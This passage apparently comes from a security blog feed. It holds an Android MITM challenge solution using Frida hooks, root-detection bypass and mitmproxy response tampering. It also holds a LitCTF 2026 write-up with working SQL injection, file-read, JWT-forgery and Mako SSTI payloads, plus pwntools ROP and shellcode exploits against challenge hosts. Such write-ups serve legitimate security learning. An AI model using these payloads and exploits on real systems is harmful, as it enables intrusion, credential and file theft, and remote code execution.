&amp;&amp; sa.add(9).readU8() === 0 &amp;&amp; sa.add(10).readU8() === 0 &amp;&amp; sa.add(11).readU8() === 0 &amp;&amp; sa.add(12).readU8() === 0 &amp;&amp; sa.add(13).readU8() === 0 &amp;&amp; sa.add(14).readU8() === 0 &amp;&amp; sa.add(15).readU8() === 0 &amp;&amp; sa.add(16).readU8() === 0 &amp;&amp; sa.add(17).readU8() === 0 &amp;&amp; sa.add(18).readU8() === 0xff &amp;&amp; sa.add(19).readU8() === 0xff; if (mapped) { const ip = `${sa.add(20).readU8()}.${sa.add(21).readU8()}.${sa.add(22).readU8()}.${sa.add(23).readU8()}`; console.log(`[mitm] ${sym}() IPv6-mapped ${ip}:${port}`); } else { console.log(`[mitm] ${sym}() IPv6 port ${port}`); } } } } }); console.log(`[mitm] ${sym} hook installed`); return true; } function hookConnect() { let hooked = false; ['connect', '__connect'].forEach(sym =&gt; { try { hooked = hookConnectSymbol(sym) || hooked; } catch (e) {} }); if (!hooked) console.log('[mitm] connect not found'); } setImmediate(() =&gt; { try { hookGetaddrinfo(); } catch (e) { console.log('[mitm] gai hook err: ' + e); } try { hookConnect(); } catch (e) { console.log('[mitm] conn hook err: ' + e); } try { hookRootDetection(); } catch (e) { console.log('[mitm] rd hook err: ' + e); } console.log('[mitm] redirect ready (target=' + TARGET_HOST + ' -&gt; ' + MITM_HOST + ':' + MITM_PORT + ')'); }); // ----- 3. defeat root detection by hiding su / magisk artifacts ----- function hookRootDetection() { const SU_PATHS = [ '/system/bin/su', '/system/xbin/su', '/sbin/su', '/su/bin/su', '/system/app/Superuser.apk', '/system/etc/init.d/99SuperSUDaemon', '/system/xbin/busybox', '/system/bin/busybox', '/sbin/.magisk', '/sbin/magisk', '/data/adb/magisk', '/dev/.magisk.unblock', '/dev/com.koushikdutta.superuser.daemon', ]; const isSuPath = (p) =&gt; p &amp;&amp; SU_PATHS.includes(p); function wrap(name, idx) { const fn = findExport(null, name); if (!fn) return; Interceptor.attach(fn, { onEnter: function (args) { try { const p = args[idx].readUtf8String(); this.faked = isSuPath(p); if (this.faked) console.log(`[antiroot] ${name}("${p}") -&gt; ENOENT`); } catch (e) {} }, onLeave: function (retval) { if (this.faked) { retval.replace(ptr(-1)); } } }); } ['access', 'stat', 'lstat', 'fstatat', 'open', 'openat', 'faccessat'].forEach(n =&gt; { try { wrap(n, n.includes('at') &amp;&amp; n !== 'fstatat' ? 1 : 0); } catch (e) {} }); // also fake `which su` / shell-based checks: make Process_Start return failure // for command lines containing "su" — only if we observe them. const cmdHook = findExport(null, 'system'); if (cmdHook) { Interceptor.attach(cmdHook, { onEnter: function (args) { try { const cmd = args[0].readUtf8String(); if (cmd &amp;&amp; /\bsu\b|magisk|busybox/.test(cmd)) { this.faked = true; console.log(`[antiroot] system("${cmd}") -&gt; 1`); } } catch (e) {} }, onLeave: function (retval) { if (this.faked) retval.replace(ptr(1)); } }); } console.log('[antiroot] file/exec hooks installed'); } </code></pre> <pre><code>它在 App 进程里用 Frida hook 两个 native 网络函数: getaddrinfo() connect() 具体做三件事: 1. 看到 App 解析: uselessfacts.jsph.pl 就把解析结果改成: 192.168.124.18 也就是你的 Windows 主机 IP。 2. 看到 App 准备连接: 192.168.124.18:443 就确认这个连接是要走 mitmproxy。 3. 修正 Android addrinfo / IPv6 情况,保证 App 不会绕过重定向继续连真实服务器 IP。 所以它解决的是: App 原本 -&gt; uselessfacts.jsph.pl:443 改成 App -&gt; 你的电脑 mitmproxy:443 </code></pre> <p>tamper.py 是 mitmproxy 的插件脚本</p> <pre><code>""" mitmproxy addon — tamper FactsDroid responses only. Constraints from the challenge: * Do NOT modify the request that the app sends to the backend. * The backend (uselessfacts.jsph.pl) is out of scope; only the response flowing back to the app may be altered. Strategy: * `request()` hook: read-only — just snapshot the request and prove we never touch it. No mutations of method/path/headers/body. * `response()` hook: rewrite the JSON body so the app prints attacker-controlled content. The genuine fact never reaches the app. """ import hashlib import json from itertools import cycle from mitmproxy import http, ctx # A rotating selection of injected payloads. INJECTED_FACTS = [ "[MITM] PWNED by Claude. This fact was injected on the wire — the real backend never sent it.", "[MITM] If you can read this in FactsDroid, the response was tampered before delivery.", "[MITM] The real fact was suppressed. You are seeing arbitrary attacker content.", "[MITM] Network-layer compromise: backend → mitmproxy → FactsDroid (rewrite).", ] _facts_iter = cycle(INJECTED_FACTS) def _request_fingerprint(req: http.Request) -&gt; str: """Build a stable fingerprint over every part of the HTTP request. If we touch anything between app→mitm and mitm→upstream, this hash will change and the proof breaks.""" h = hashlib.sha256() h.update(req.method.encode()) h.update(b"\x00") h.update(req.path.encode()) h.update(b"\x00") # Headers, sorted to be stable across mitmproxy's internal reordering. for k, v in sorted(req.headers.items(True)): h.update(k.encode().lower()) h.update(b":") h.update(v.encode()) h.update(b"\n") h.update(b"\x00") h.update(req.raw_content or b"") return h.hexdigest()[:16] def request(flow: http.HTTPFlow) -&gt; None: """READ-ONLY. Logs request fingerprint then returns; no mutation.""" if flow.request.host != "uselessfacts.jsph.pl": return if "/api/v2/facts/random" not in flow.request.path: return fp = _request_fingerprint(flow.request) flow.metadata["fp_in"] = fp ctx.log.info( f"[passthrough] app -&gt; mitm: {flow.request.method} " f"{flow.request.path} headers={dict(flow.request.headers)} " f"body_len={len(flow.request.raw_content or b'')} fp={fp}" ) def requestheaders(flow: http.HTTPFlow) -&gt; None: pass def response(flow: http.HTTPFlow) -&gt; None: if flow.request.host != "uselessfacts.jsph.pl": return if "/api/v2/facts/random" not in flow.request.path: return # Re-fingerprint the request *now*, after mitmproxy has emitted it # upstream. If we never modified it, the hash equals the one we took # in request() — so backend received the same request the app sent. fp_now = _request_fingerprint(flow.request) fp_in = flow.metadata.get("fp_in", "&lt;missing&gt;") same = "MATCH" if fp_now == fp_in else "DIVERGED" ctx.log.info( f"[passthrough] mitm -&gt; backend: fp_in={fp_in} fp_out={fp_now} {same}" ) try: body = json.loads(flow.response.get_text() or "{}") except Exception as exc: ctx.log.warn(f"[tamper] response not JSON: {exc}") return original = body.get("text", "&lt;no text&gt;") body["text"] = next(_facts_iter) body["source"] = "claude-mitm" body["source_url"] = "https://attacker.local/injected" body["language"] = "en" body["permalink"] = "https://attacker.local/injected" flow.response.set_text(json.dumps(body)) flow.response.headers["content-type"] = "application/json; charset=utf-8" if "content-length" in flow.response.headers: del flow.response.headers["content-length"] ctx.log.info(f"[tamper] suppressed real fact: {original!r}") ctx.log.info(f"[tamper] delivered injected fact: {body['text']!r}") </code></pre> <pre><code>mitmproxy 收到 App 请求后,它做两件事: 1. request(flow) 只记录请求,不修改请求。 它会计算请求指纹: fp = _request_fingerprint(flow.request) 作用是证明: App 发出的请求 和 mitmproxy 转发给后端的请求 是一致的 所以日志里会出现: MATCH 这符合挑战限制:不能攻击后端,不能篡改请求。 2. response(flow) 只修改后端返回给 App 的响应。 它把真实返回的 JSON 解析出来: body = json.loads(flow.response.get_text() or "{}") 然后改掉里面的 text 字段: body["text"] = next(_facts_iter) 也就是把原本的 fact 换成: [MITM] ... 最后重新写回响应: flow.response.set_text(json.dumps(body)) 所以它解决的是: 后端真实响应 -&gt; mitmproxy 修改 text 字段 -&gt; App 显示假内容 </code></pre> <p>最终效果</p> <p><img src="./images/img-13.png" alt="Image" /></p> <p><img src="./images/img-14.png" alt="Image" /></p> <p>网址:https://academy.8ksec.io/path-player?courseid=android-application-exploitation-challenges&amp;unit=681ad36a3585c25a8c0661daUnit</p> LitCTF 2026 Hnusec1 战队 wphttps://blog-5w0.pages.dev/posts/litctf-2026/https://blog-5w0.pages.dev/posts/litctf-2026/LitCTF 2026 Web / Pwn / Reverse / Crypto / Misc 部分题解,队伍 Hnusec1 排名第 8。Mon, 01 Jun 2026 00:00:00 GMT<p>队伍名称:Hnusec1</p> <p>成员用户名:weixiao cinco J4toPos</p> <p>队伍排名:8</p> <h1>web</h1> <h2>lit_ezsql</h2> <p>进入后是一个查询页面</p> <p><img src="./images/img-01.png" alt="Figure 1" /></p> <p>我们正常输入id=1,回显一行五列结果</p> <p><img src="./images/img-02.png" alt="Figure 2" /></p> <p>首先是尝试了常规的 " ' \ 但都没有触发报错,这里我们换一个思路</p> <p>尝试一下宽字节注入,出现报错</p> <pre><code>id=1%df%27 </code></pre> <p>这个payload就相当于 宽字节前缀 + 单引号,在 GBK 编码下 会被数据库解释成一个合法的宽字节字符</p> <p><img src="./images/img-03.png" alt="Figure 3" /></p> <p>继续测试</p> <pre><code>?id=1%df%27 or 1=1%23 </code></pre> <p><img src="./images/img-04.png" alt="Figure 4" /></p> <p>返回了两行数据,说明注入确认成功。</p> <p>由于正常查询结果中页面回显了五个字段,因此可以直接尝试五列联合查询。</p> <pre><code>?id=-1%df' union select 1,2,3,4,5%23 </code></pre> <p>注入成功</p> <p><img src="./images/img-05.png" alt="Figure 5" /></p> <p>查数据库</p> <pre><code>?id=-1%df' union select 1,database(),3,4,5%23 </code></pre> <p>得到</p> <pre><code>ezsql </code></pre> <p>查表名</p> <pre><code>?id=-1%df' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()%23 </code></pre> <p>得到</p> <pre><code>users,flag_store </code></pre> <p>查列名,注意这里要用十六进制绕过引号</p> <pre><code>?id=-1%df' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x666c61675f73746f7265%23 </code></pre> <p>得到</p> <pre><code>id,flag </code></pre> <p>最后读flag</p> <pre><code>?id=-1%df' union select 1,flag,3,4,5 from flag_store%23 </code></pre> <p><img src="./images/img-06.png" alt="Figure 6" /></p> <p>得到</p> <pre><code>flag{stlqpk43-cxn2-4vp-8dve-9vdtmpqho6ndq} </code></pre> <h2>Northbridge Document Hub</h2> <p>进入后是一个登录界面</p> <p><img src="./images/img-07.png" alt="Figure 7" /></p> <p>查看前端源码,发现会加载 assets/js/portal.js</p> <p><img src="./images/img-08.png" alt="Figure 8" /></p> <p>看一下这个js</p> <pre><code>(function () { var bootstrap = { release: "2026.03.01-r12", region: "cn-sh2", auth: { mode: "legacy-fallback", // researcher:Research#2026 seed: "cmVzZWFyY2hlcjpSZXNlYXJjaCMyMDI2" }, fileGateway: { path: "/kkfileview/getCorsFile", queryKey: "urlPath", node: "legacy-parse-02" } }; window.NorthbridgePortal = { config: bootstrap, decodeLegacyCredential: function () { try { return atob(bootstrap.auth.seed); } catch (e) { return ""; } } }; var form = document.querySelector("form[data-auth='portal']"); if (form) { form.addEventListener("submit", function () { form.classList.add("is-submitting"); }); } })(); </code></pre> <p>有一个base64</p> <pre><code>cmVzZWFyY2hlcjpSZXNlYXJjaCMyMDI2 </code></pre> <p><img src="./images/img-09.png" alt="Figure 9" /></p> <p>可以拿到密码去登录</p> <pre><code>researcher Research#2026 </code></pre> <p>登录后进入</p> <p><img src="./images/img-10.png" alt="Figure 10" /></p> <p>这里检索一下有没有 kkFileView 的 cve</p> <p>这里有一个 CVE-2021-43734</p> <p>https://blog.csdn.net/weixin_44304678/article/details/134320057</p> <p>可以构造poc</p> <pre><code>/kkfileview/getCorsFile?urlPath=file:///etc/passwd </code></pre> <p>但是如果直接发会失败,说明设了一个简单的waf</p> <p>根据源码猜测可能是要base64编码绕过,尝试进行一下编码</p> <pre><code>file:///etc/passwd ZmlsZTovLy9ldGMvcGFzc3dk </code></pre> <p><img src="./images/img-11.png" alt="Figure 11" /></p> <p>实现绕过,可以任意文件读取</p> <p><img src="./images/img-12.png" alt="Figure 12" /></p> <p>这里我们去读的是</p> <pre><code>/root/.bash_history </code></pre> <p>也就是</p> <pre><code>ZmlsZTovLy9yb290Ly5iYXNoX2hpc3Rvcnk= </code></pre> <p>得到</p> <pre><code>cd /opt/kkfileview/bin ./startup.sh --cache.dir=/opt/kkfileview/cache/parsed java -jar kkFileView.jar --cache.dir=/opt/kkfileview/cache/parsed --forceUpdatedCache=true cp /opt/kkfileview/cache/parsed/q1_finance_report_2026.zip /tmp/q1_finance_report_2026.zip </code></pre> <p>我们直接去读</p> <pre><code>/opt/kkfileview/cache/parsed/q1_finance_report_2026.zip </code></pre> <p>解压后拿到flag</p> <p><img src="./images/img-13.png" alt="Figure 13" /></p> <pre><code>flag{fic9nvxj-lyyc-4zq-8iv6-rbjnqwyfjbbre} </code></pre> <h2>华辰企业服务运营平台</h2> <p>进入后是一个运营平台,进入系统需要登录</p> <p><img src="./images/img-14.png" alt="Figure 14" /></p> <p>dirsearch扫一下,可以发现有一个 /actuator</p> <p><img src="./images/img-15.png" alt="Figure 15" /></p> <p>访问后暴露一些路由</p> <p><img src="./images/img-16.png" alt="Figure 16" /></p> <p>我们直接去读</p> <pre><code>/actuator/env </code></pre> <p>可以直接拿到flag</p> <pre><code>flag{ijap7qay-mqfe-4yo-8pk3-cchdrmx9ckloj} </code></pre> <p><img src="./images/img-17.png" alt="Figure 17" /></p> <h2>lit_reverse_my_web</h2> <p>题目给了一个exe附件,为什么web手还得会逆向()</p> <p>扔进ida,分析main</p> <p><img src="./images/img-18.png" alt="Figure 18" /></p> <p>也就是 Go 源码大致长这样:</p> <pre><code>// internal/jwtsecret/jwtsecret.go var encKey = []byte{ 0x28,0x17,0x2D,0x05, 0x68,0x6A,0x68,0x6C, 0x05,0x36,0x33,0x2E, 0x39,0x2E,0x3C,0x05, 0x30,0x2D,0x2E,0x05, 0x29,0x3F,0x39,0x28, 0x3F,0x2E,0x05,0x31, 0x3F,0x23,0x7B,0x7B, } func Key() []byte { out := make([]byte, len(encKey)) for i, b := range encKey { out[i] = b ^ 0x5A } return out } </code></pre> <p>提取 encKey</p> <p><code>reverseMyWeb\_internal\_jwtsecret\.encKey</code> 实际是一个 slice header,位于 <code>\.data</code> 段:</p> <pre><code>0xF68950: E0 E6 F0 00 00 00 00 00 // ptr -&gt; 0xF0E6E0 0xF68958: 20 00 00 00 00 00 00 00 // len = 32 0xF68960: 20 00 00 00 00 00 00 00 // cap = 32 </code></pre> <p>读 <code>0xF0E6E0</code> 的 32 字节:</p> <pre><code>28 17 2D 05 68 6A 68 6C 05 36 33 2E 39 2E 3C 05 30 2D 2E 05 29 3F 39 28 3F 2E 05 31 3F 23 7B 7B </code></pre> <p>逐字节 XOR <code>0x5A</code>:</p> <table> <thead> <tr> <th><code>0x28</code></th> <th><code>0x17</code></th> <th><code>0x2D</code></th> <th><code>0x05</code></th> <th><code>0x68</code></th> <th><code>0x6A</code></th> <th><code>0x68</code></th> <th><code>0x6C</code></th> </tr> </thead> <tbody> <tr> <td><code>r</code></td> <td><code>M</code></td> <td><code>w</code></td> <td><code>\_</code></td> <td><code>2</code></td> <td><code>0</code></td> <td><code>2</code></td> <td><code>6</code></td> </tr> </tbody> </table> <p>完整字符串:</p> <pre><code>rMw_2026_litctf_jwt_secret_key!! </code></pre> <p>main.signJWT:claims 结构</p> <pre><code>// main.(*app).signJWT @ 0x9492a0 v16.RegisteredClaims.Issuer.str = "reverseMyWeb"; v16.RegisteredClaims.Issuer.len = 12; v16.RegisteredClaims.Subject = sub; v16.RegisteredClaims.IssuedAt = now (truncated); v16.RegisteredClaims.ExpiresAt = now + *24h*; v16.Role = role; SignedString(app.jwtKey) // HS256 </code></pre> <p>对应 Go 结构:</p> <pre><code> ```go type claims struct { Role string `json:"role"` jwt.RegisteredClaims } </code></pre> <p>签发时算法是 <code>SigningMethodHS256</code></p> <p>main.parseToken:鉴权来源</p> <pre><code>// main.(*app).parseToken @ 0x949660 hdr = req.Header.Get("Authorization") if strings.ToLower(hdr).hasPrefix("bearer ") { raw = strings.TrimSpace(hdr[7:]) } else if c, _ := req.Cookie("token"); c != nil { raw = c.Value } ParseWithClaims(raw, &amp;main.claims{}, func(t) (interface{}, error) { return app.jwtKey, nil }) </code></pre> <p>也就是 token 可以放在 <code>Authorization: Bearer \&amp;lt;jwt\&amp;gt;</code> 或 <code>Cookie: token=\&amp;lt;jwt\&amp;gt;</code>。</p> <p>main.handleFlag:访问控制</p> <pre><code>// main.(*app).handleFlag @ 0x9486a0 c = parseToken(req); if (!c.ok) → 401 "会话无效或已过期" if (c.role != "admin" // 0x6e + 'admi' (1768776801) || len(c.role) != 5) → 403 "您暂无此资源的访问权限" data = os.ReadFile("/flag"); if wantsJSON(req): JSON {"content": strings.TrimSpace(data)} else: text/plain </code></pre> <blockquote> <p><code>1768776801 == \&amp;\#39;admi\&amp;\#39;\(LE\)</code>、紧跟 <code>\&amp;\#39;n\&amp;\#39;</code>,长度 5 — 即字符串 <code>\&amp;\#34;admin\&amp;\#34;</code>。</p> </blockquote> <p>接下来访问靶机,访问后是一个工作台,可以登录</p> <p><img src="./images/img-19.png" alt="Figure 19" /></p> <p>先拿dirsearch扫,可以得到</p> <pre><code>GET / GET /login POST /login GET /register POST /register POST /logout GET /flag GET /static/* </code></pre> <p><img src="./images/img-20.png" alt="Figure 20" /></p> <p>我们直接用刚才拿到的key伪造JWT</p> <pre><code>*// header* {"alg":"HS256","typ":"JWT"} *// payload* {"role": "admin","sub": "admin","iss": "reverseMyWeb","iat": &lt;now&gt;,"exp": &lt;now + 86400&gt;} </code></pre> <p>签名 = <code>HMAC\_SHA256\(secret, base64url\(header\) \+ \&amp;\#34;\.\&amp;\#34; \+ base64url\(payload\)\)</code>。</p> <p>解题脚本如下</p> <pre><code>import hmac import hashlib import base64 import json import time import urllib.request import urllib.error SECRET = b"rMw_2026_litctf_jwt_secret_key!!" TARGET = "http://challenge.cyclens.tech:31020" def b64u(data: bytes) -&gt; str: return base64.urlsafe_b64encode(data).rstrip(b"=").decode() def forge_jwt(role: str = "admin", sub: str = "admin", iss: str = "reverseMyWeb", ttl: int = 86400) -&gt; str: header = {"alg": "HS256", "typ": "JWT"} now = int(time.time()) payload = { "role": role, "sub": sub, "iss": iss, "iat": now, "exp": now + ttl, } h = b64u(json.dumps(header, separators=(",", ":")).encode()) p = b64u(json.dumps(payload, separators=(",", ":")).encode()) sig = hmac.new(SECRET, f"{h}.{p}".encode(), hashlib.sha256).digest() return f"{h}.{p}.{b64u(sig)}" def get_flag(token: str) -&gt; str: req = urllib.request.Request( TARGET + "/flag", headers={ "Authorization": "Bearer " + token, "Cookie": "token=" + token, "Accept": "application/json", }, ) with urllib.request.urlopen(req, timeout=20) as r: return r.read().decode("utf-8", errors="replace") def decode_enc_key(): enc_key = bytes.fromhex( "28172D05686A686C0536332E392E3C05" "302D2E05293F39283F2E05313F237B7B" ) plain = bytes(b ^ 0x5A for b in enc_key) print("[*] encKey :", enc_key.hex()) print("[*] secret :", plain.decode()) assert plain == SECRET if __name__ == "__main__": decode_enc_key() token = forge_jwt() print("[*] forged JWT:") print(token) print("[*] requesting /flag ...") try: body = get_flag(token) print("[+] response:") print(body) except urllib.error.HTTPError as e: print(f"[-] HTTP {e.code}") print(e.read().decode(errors="replace")) </code></pre> <p>运行拿到flag</p> <p><img src="./images/img-21.png" alt="Figure 21" /></p> <pre><code>flag{ivwqa2na-6enh-4yt-8bhr-3l5y8zkmygyx4} </code></pre> <h2>lit_ezssti</h2> <p>进入后可以发现是一个模版渲染表单,那肯定就是打ssti了</p> <p>测试一下常见的payload,比如{{7*7}}等等,发现都没用,直到试了下面这个</p> <pre><code>%if 1% </code></pre> <p>触发报错</p> <p><img src="./images/img-22.png" alt="Figure 22" /></p> <p>根据这些字符串,可以推测是mako模版</p> <p>fuzz一下,可以得到以下黑名单</p> <pre><code>[ ] = . &lt;%= ${ flag self. </code></pre> <p>在mako中,可以用 &amp;lt;% ... %&amp;gt; 执行python代码,但是没有回显,这里我们可以用</p> <pre><code>raise Exception </code></pre> <p>实现渲染异常,从而得到回显</p> <pre><code>&lt;% from os import popen; raise Exception(getattr(popen("whoami"), "read")()) %&gt; </code></pre> <p><img src="./images/img-23.png" alt="Figure 23" /></p> <p>然后用from os import popen绕过os.popen</p> <p>getattr(obj, &amp;#34;read&amp;#34;)() 绕过 .read()</p> <p>用chr拼接绕过flag</p> <p>payload如下</p> <pre><code>&lt;% from os import popen; raise Exception(getattr(popen(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)),chr(114)+chr(101)+chr(97)+chr(100))()) %&gt; </code></pre> <p>拿到flag</p> <p><img src="./images/img-24.png" alt="Figure 24" /></p> <pre><code>flag{1wuiv7yx-mfmi-4uw-8usy-jhnfwupf1veau} </code></pre> <h1>Pwn</h1> <h2>lit_ret2text32</h2> <p>简单签到题</p> <p><img src="./images/img-25.png" alt="Figure 25" /></p> <p><img src="./images/img-26.png" alt="Figure 26" /></p> <p>栈溢出有后门</p> <pre><code>from pwn import * context(os='linux', log_level='debug') p = process('./ret2text32') #p=remote("challenge.cyclens.tech",30425) elf=ELF("./ret2text32") bk=0x8049213 payload=b'a'*0x3c+p64(bk) p.sendlineafter("Input: ",payload) p.interactive() </code></pre> <p><img src="./images/img-27.png" alt="Figure 27" /></p> <h2>lit_ret2shellcode</h2> <p><img src="./images/img-28.png" alt="Figure 28" /></p> <p><img src="./images/img-29.png" alt="Figure 29" /></p> <p>栈段可执行,又泄露出了栈地址</p> <p>直接向栈内写入shellcode,然后控制执行流到buf</p> <pre><code>from pwn import * context(os='linux', log_level='debug',arch='amd64') #p = process('./ret2shellcode') p=remote("challenge.cyclens.tech",31103) elf=ELF("./ret2shellcode") p.recvuntil(b'0x') buf=int(p.recv(12),16) log.info("buf:"+hex(buf)) shellcode=asm(shellcraft.sh()) payload=shellcode.ljust(0x78,b'a') payload+=p64(buf) p.sendlineafter("Leave your mark on the stack: ",payload) p.interactive() </code></pre> <p><img src="./images/img-30.png" alt="Figure 30" /></p> <h2>lit_integer_overflow</h2> <p><img src="./images/img-31.png" alt="Figure 31" /></p> <p>有后门backdoor,有栈溢出,只不过需要绕过对size的检测</p> <p>注意到size比较时是unsigned int类型,整数溢出,输入-1</p> <p>-1&amp;lt;0x40,绕过检测,同时负数转化为0xff……溢出空间足够大</p> <pre><code>from pwn import * context(os='linux', log_level='debug',arch='amd64') p = process('./integer_overflow') #p=remote("challenge.cyclens.tech",31104) elf=ELF("./integer_overflow") bk=0x4011D8 p.sendlineafter("(0-63): ",b'-1') payload=b'a'*0x48+p64(bk) p.sendline(payload) p.interactive() </code></pre> <p><img src="./images/img-32.png" alt="Figure 32" /></p> <h2>lit_ropchain</h2> <p><img src="./images/img-33.png" alt="Figure 33" /></p> <p>rop链,gadget都给出来了,有system没有binsh</p> <p>先向bss段read一个/bin/sh\x00</p> <pre><code>read(0,bss,0x10) </code></pre> <p>然后打出</p> <p>system(&amp;#34;/bin/sh&amp;#34;)</p> <pre><code>from pwn import * context(os='linux', log_level='debug',arch='amd64') #p = process('./ropchain') p=remote("challenge.cyclens.tech",31002) elf=ELF("./ropchain") pop_rdi=0x401166 pop_rsi=0x40116B pop_rdx=0x401170 bss = elf.bss() + 0x500 read=elf.plt["read"] system=elf.plt["system"] payload = b'a'*0x48 payload += p64(pop_rdi) payload += p64(0) payload += p64(pop_rsi) payload += p64(bss) payload += p64(pop_rdx) payload += p64(0x10) payload += p64(read) payload += p64(pop_rdi) payload += p64(bss) payload += p64(system) p.sendlineafter("Input: ",payload) p.sendline(b'/bin/sh') p.interactive() </code></pre> <p><img src="./images/img-34.png" alt="Figure 34" /></p> <h2>lit_ret2syscall32</h2> <p><img src="./images/img-35.png" alt="Figure 35" /></p> <p>gadget很全,栈溢出空间足够,唯一一个问题是没有可用的/bin/sh</p> <p>先调用read函数向bss段写binsh,然后返回到vuln</p> <p>然后用syscall调用execve(&amp;#34;/bin/sh&amp;#34;,0,0)</p> <pre><code>from pwn import * context(os='linux', log_level='debug') #p = process('./ret2syscall32') p=remote("challenge.cyclens.tech",30689) elf=ELF("./ret2syscall32") pop_eax=0x80491A6 pop_ebx=0x80491AB pop_ecx_ebx=0x80491B0 pop_edx=0x80491B6 int80=0x80491C1 bss=elf.bss()+0x200 #gdb.attach(p) payload = flat( b"A" * 0x4c, elf.plt["read"], elf.sym["vuln"], 0, bss, 10, ) p.sendlineafter("Input: ",payload) pause() p.sendline(b'/bin/sh\x00') payload = flat( b"A" * 0x4c, pop_eax, 0xb, pop_ecx_ebx, 0, bss, pop_edx, 0, int80 ) p.sendlineafter("Input: ",payload) p.interactive()lit_ret2libc </code></pre> <p><img src="./images/img-36.png" alt="Figure 36" /></p> <h2>lit_ret2libc</h2> <p><img src="./images/img-37.png" alt="Figure 37" /></p> <p>leak可以泄露地址,把got表当作参数传入即可泄露libc</p> <p>这里出了问题,跳回到vuln失败</p> <p>不懂怎么回事,只能用其他方法打了</p> <p>把 saved rbp 伪造成 .bss+0x40,然后跳到 vuln 里现成的 read 准备位置。这样程序会把第二阶段 payload 直接读进 .bss,最后用函数尾的 leave; ret 把栈迁移过去。</p> <p>第二阶段</p> <p>在 .bss 里放一个 &amp;#34;/bin/sh\x00&amp;#34; 和 argv = {&amp;#34;/bin/sh&amp;#34;, NULL},然后 ROP 调:</p> <p><code>execve\(\&amp;\#34;/bin/sh\&amp;\#34;, argv, NULL\)</code></p> <pre><code>from pwn import * context(os='linux', log_level='debug',arch='amd64') #p = process('./ret2libc') p=remote("challenge.cyclens.tech",31534) elf=ELF("./ret2libc") libc=ELF("./libc_remote.so") ret=0x40101A pop_rdi=0x4011B7 leak=0x4011C3 read_setup=0x40121B bss=elf.bss()+0x800 fake_rbp=bss+0x40 stage1 = flat( b'a'*0x40, p64(fake_rbp), p64(ret), p64(pop_rdi), elf.got["puts"], p64(leak), p64(read_setup) ) p.sendlineafter("Tell me your name: ",stage1) p.recvuntil(b'0x') puts=int(p.recv(12),16) log.info("puts:"+hex(puts)) libc_base=puts-libc.sym["puts"] execve=libc_base+libc.sym["execve"] pop_rsi=libc_base+0x2be51 pop_rdx_r12=libc_base+0x11f367 ret2=libc_base+0x29139 log.info(hex(libc_base)) log.info(hex(execve)) binsh=bss+0x100 argv=bss+0x120 payload=bytearray(b'\x00'*0x180) payload[0x100:0x108]=b'/bin/sh\x00' payload[0x120:0x130]=flat(p64(binsh),p64(0)) rop=flat( p64(ret2), p64(pop_rdi),p64(binsh), p64(pop_rsi),p64(argv), p64(pop_rdx_r12),p64(0),p64(0), p64(execve) ) payload[0x40:0x48]=p64(0) payload[0x48:0x48+len(rop)]=rop p.send(bytes(payload)) p.interactive() </code></pre> <p><img src="./images/img-38.png" alt="Figure 38" /></p> <h1>Reverse</h1> <h2>lit_rc4_variant</h2> <p>程序拖入IDA,找到main函数,输入长度要求29</p> <p><img src="./images/img-39.png" alt="Figure 39" /></p> <p>把输入复制到加密缓冲</p> <p><img src="./images/img-40.png" alt="Figure 40" /></p> <p>加密缓冲约定</p> <p><strong>KSA 第一阶段:`S[i] = i` 和 `K[i] = key[i % 12]</strong></p> <p><img src="./images/img-41.png" alt="Figure 41" /></p> <p><img src="./images/img-42.png" alt="Figure 42" /></p> <p><strong>KSA 第二阶段</strong></p> <p><img src="./images/img-43.png" alt="Figure 43" /></p> <p><strong>PRGA + XOR</strong></p> <p><img src="./images/img-44.png" alt="Figure 44" /></p> <p>总结这套魔改算法(<code>encrypt\(input\)</code>):</p> <pre><code>S[64] = 0..63 K[i] = key[i % len(key)] for i in 0..63 j = 0 for i in 0..63: j = (j + S[i] + K[i]) mod 64 swap(S[i], S[j]) # 标准 KSA,但模 64 而不是 256 i = j = 0 for each byte b of plaintext: i = (i + 1) mod 64 j = (j + S[i]) mod 64 t = (S[i] + S[j]) mod 64 # ← 这里是 mod 64! swap(S[i], S[j]) ks = (S[i] + S[t]) mod 256 # ← 输出是 “两个 S 项相加”,不是 S[(S[i]+S[j])&amp;0xFF] cipher_byte = b ^ ks </code></pre> <p><strong>比对密文</strong></p> <p><img src="./images/img-45.png" alt="Figure 45" /></p> <p><strong>解题脚本</strong></p> <pre><code>key = b"lit_rc4_key!" ct = bytes([0x7b,0x3d,0x38,0x77,0x4e,0x72,0x42,0x7d,0x45,0x37,0x76,0x0f, 0x53,0x53,0x4f,0x66,0x37,0x17,0x75,0x37,0x5f,0x49,0x58,0x72, 0x74,0x7f,0x79,0x1f,0x3a]) S = list(range(64)) K = [key[i % len(key)] for i in range(64)] j = 0 for i in range(64): j = (j + S[i] + K[i]) % 64 S[i], S[j] = S[j], S[i] i = j = 0 out = bytearray() for c in ct: i = (i + 1) % 64 s_i_old = S[i] j = (j + s_i_old) % 64 s_j_old = S[j] t = (s_i_old + s_j_old) % 64 # swap S[i], S[j] = S[j], S[i] # keystream = S[i]_new + S[t] where S[t] uses post-swap state K_byte = (S[i] + S[t]) &amp; 0xFF out.append(c ^ K_byte) print("Plaintext:", out) try: print("Decoded:", out.decode()) except UnicodeDecodeError: print("Not pure ASCII") </code></pre> <p>LitCTF{rev05_rc4_variant_64!}</p> <h2>lit_tea_standard</h2> <p>main函数如下</p> <p><img src="./images/img-46.png" alt="Figure 46" /></p> <p>几个关键点:</p> <ol> <li> <p>明文长度:填充后 v7 == 32,意味着原 flag 长度落在 25..31(含 31,但 31 时填一个 \x01,长度则达到 32)。</p> </li> <li> <p>轮数 / delta:循环条件 i != -957401312 即 i != 0xC6EF3720,恰好等于 32 * 0x9E3779B9,标准 TEA 32 轮。</p> </li> <li> <p>密钥:把 + 形式里出现的负常量按无符号还原</p> </li> </ol> <p>16 * v 在 TEA 里就是 v &amp;lt;&amp;lt; 4,对应分支:</p> <ul> <li> <p>v1 += ((v0 &amp;lt;&amp;lt; 4) + k0) ^ (v0 + sum) ^ ((v0 &amp;gt;&amp;gt; 5) + k1)</p> </li> <li> <p>v0 += ((v1 &amp;lt;&amp;lt; 4) + k2) ^ (v1 + sum) ^ ((v1 &amp;gt;&amp;gt; 5) + k3)</p> </li> </ul> <p>再看一眼密文 g_cipher(位于 .rdata: 0x140012040,32 字节):</p> <p><img src="./images/img-47.png" alt="Figure 47" /></p> <p>解题脚本</p> 